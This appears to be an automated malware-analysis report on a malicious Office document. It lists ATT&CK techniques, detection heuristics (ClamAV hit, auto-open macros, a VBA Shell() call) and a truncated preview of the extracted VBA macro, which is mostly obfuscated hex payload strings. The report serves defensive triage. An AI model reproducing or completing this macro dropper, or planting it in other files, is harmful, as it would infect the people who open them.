MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The file contains VBA macros, including a Document_Open and Workbook_Open event handler, which is a common technique for malicious Office documents. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute an external command. While the exact payload is obfuscated, the presence of these elements strongly suggests a downloader or droppper functionality. The ClamAV detection further confirms its malicious nature.
Heuristics 7
-
ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14294 bytes |
SHA-256: 2e637f8958cd664bffdf2866d12d8c4c5645eef52999526f4b20595469faa633 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 52 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub K_AF()
Dim R_QZ As String
R_QZ = "4F7A8D9F8A747A7A7A717A7AA87A798860657A737045583D7A674E7A7A997A437B7A7A7A447A667A7ABE7AEF3B7A7AB4817A58956D72497AB55AB97AA57AA07A7A7A7A567A7AB2B07E7A7273A59A7A717AB75DB848857A3B7A7A7C7A617759497A3D6CB17A4F7A517A7A7A5"
Dim I_D As String
I_D = "A56867A7A7A7A807A5B7A7A7A6FB5A07A5496A87A7A464FA3B6A1A285607A90B93C7AA170B87A4C7A91757A78AE7A7B3F7A28B47542B57A7A517A727A7A977A7AB38D7A7A7A7A7AA47A9E65427A6180A4597A7A7F7A617A7AA17AB396B78F7A7A5DB6AB7A7A7A9C7A7A9891"
Dim PJK_B As String
PJK_B = "494F9E7AAF7AACB97A7A6AB27A729A488E49AA857A7A7A747A5C7A96B78199937A607A7A7A7A50867A7A7AA77A7A3C7A908A7A7AA77A577AA1B37A7A5E5D7A7A59754D7A7DB169947A3E7A907A7A3E7A7A7A617AB27A87A8A57AB2A17A7A7A7A7A7A887AAA63897A5B7A7AA"
Dim ZL_UGR As String
ZL_UGR = "47A7A507AB07A937A7A937A7AA9B17A7A7A7D7A4FB84DB9816A7AB7827A7A7A7A7A7A7A49637A60B97A7A7A7A7A937C7A7A843E55697A7A7A7AA97A465D7A7A5C7A586F9492937A7AB3A07A7AA2B961887A7A947A7A7A7A538742864B44E27A527A7A7A887AB87AAA9A7A8B"
Dim CTM_DX As String
CTM_DX = "7A72899683A74AAEAC47994D6356478A477A7A7A7A4A7A7A7ABA7AA96BA37E9E487A5C507A7A7A7A6EB8459BAAB86D7A697A7A3B7A7A9A7AA77A7D437A7A407A7A7A7A587A4E3E7A7A7A827A3C7A7A3D7A927A484C74A64E7A7A6C4C7AB07CA0A57A737A7A7A6B7A7A44916"
Dim EJ_N As String
EJ_N = "1997A9C7A7B7AAC817AAE7A7A7A7A7A7A7A567C7A5D437A9DA47A62534B437A807A7A727A977A7A7A59AD7AB23B5175AD7A45AB757AB77A7A448D7A7A85697AA67A807A7A8A7A7A65AD2A7A589C8E7A7A99407A7A9A744AB37A447A657A7A557A7A84A77AA4AF7A4BAE7A7A"
Dim JTA_W As String
JTA_W = "767A7A7E7A7A7A7A6F7A487A487A7A7A5EA37A7A44507A7A497A7A4A777A53927A7A5A7A81A07A7A7A7AB64B7A7A7A7AA384B3687A7A8A8E7A4E7A7A66AF7A537A7AB35D587A8EA27A8D7A7A7AA17A6FA46E7A7A5E7E967A7A7A7A47B2AE7A7A7A6C9D7A85B15F7A7A6D507"
Dim LER_QU As String
LER_QU = "AB2B5A37A7A7A9A7AAB577A8F7A7AA37A7A707A7AA47A7A937A7A7B7A7A897A84667A7ABA7A7A7A80497A7AAE98417AAB9F7A7A497A7A498858A77A7AA28E7A7A7A7A7395A27A7A687A7A7A7A7A807A75457F7A687A577A7AAC7A7A6851467A8F7A7AB57A8F447A7A7AA158"
Dim QFX_PS As String
QFX_PS = "4056B07A7A9A7A5DA5AE54A4437F7A7A487A517A7A7A409356A77A769E7A477A7A7A91467A917A9A7A8A7AAD7AA55DB37AAC7AAB4FB8ABBA7A7A7A7A417A487A858F7A7A4FAC9A777A867A7A86537A7A7A887A7AB57A7AA57A83447A7A626F7A829F924C7ABAAE7A5F7A4D4"
Dim J_IWN As String
J_IWN = "A7A7A563EAD7A7AB47A7B7A7A7A59927A7A3C7A7AAF7AB77A9B7AA153B17A7A7A3E68417547657A57427AB07A9B57477A7A7A9C6F7A7A7A7A9F6A4D7A7A7A897A4B55657AA07A917A937A7A4F7AA885477A5F7A8E7A3F7AB98D7A7A7AB5787A6D7A7A817A995A7A76A97A71"
Dim ELQ_GJ As String
ELQ_GJ = "7A7A7A7A7A927A7A507A694E8795867A7A7A7A61947A7AA97A7A7A7A7AB97A747A7A9F937A7A606C9A6A47A47A5D7A7A567A887A7AAA7A42727A7A7A817A777A9C5BA67A619F7A7A7A7AB87A407AED5E7A6A6C657AAB7A985B78878D7A7AB2437A7A417A7A7A7A7AB0A47D6"
Dim DSV_KXU As String
DSV_KXU = "D7A7A5A5E66489E717A7A7A7A7E7A7A7A44A57A887A54457A7A7A94AB7E7A7A7A557AB59A6D7A9E7A4F7A787A477AAD607A9D7A467A7A707A7AAE7A777A7A7A7A9F7A90707A8D7C427A74657A887A7AB76F7A7A937A607A7AB97A7E616D5B7A7A7A48587A4A973E757A457A"
Dim NHT_R As String
NHT_R = "7A7ABA3F4C6E4A7A7A7A9F9C7A7A7AAC5386657A7A7A997F877A7A7AB5A37A3E7A7AA17A577AB87A7A7A7A7A7BB7995E7A7A7A407A7A9C757A7A725E705B7A9BB27A95B47A7AB87A7A3B8D7A47907A7A7A7A9A7A4C7A3FB39E7A817A7A9E7A657A7A3E7A457A7C7A5F7AB27"
Dim MRP_UIF As String
MRP_UIF = "A7A7A7A957A967A3C7A7A7AAF817A7AA18F787A817A7DBA7A597A577AA37A719CB97A7A7A7A6B7A437A64727B7A6F7A4A8D7A7A7A7A7AA4A53B767A79897A7A995B7A8B7A867A5F7A7A9F467A527A7A47967A7A7A7A3C89747A7A9E7A847A9F7A9C79AD6A427A7A7A7A7A98"
Dim QK_N As String
QK_N = "657A8C7A6C7A7A7A7A837A897A4C496A7A569F7A987A7AAC7A8E3B7F7A6F7AAC7A49DEA67A917A56547A5F7A7A7AB6407A677A7A7A6F7A7A8E7AD87A4F427A3E877A6A7A49415F7D7A5E887B98737A7A7A757C7A7A7A7F7A467A88407A827A7AB57A7A40587A7A7A7A7A744"
Dim U_OCC As String
U_OCC = "E7C7A7A7AA3
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.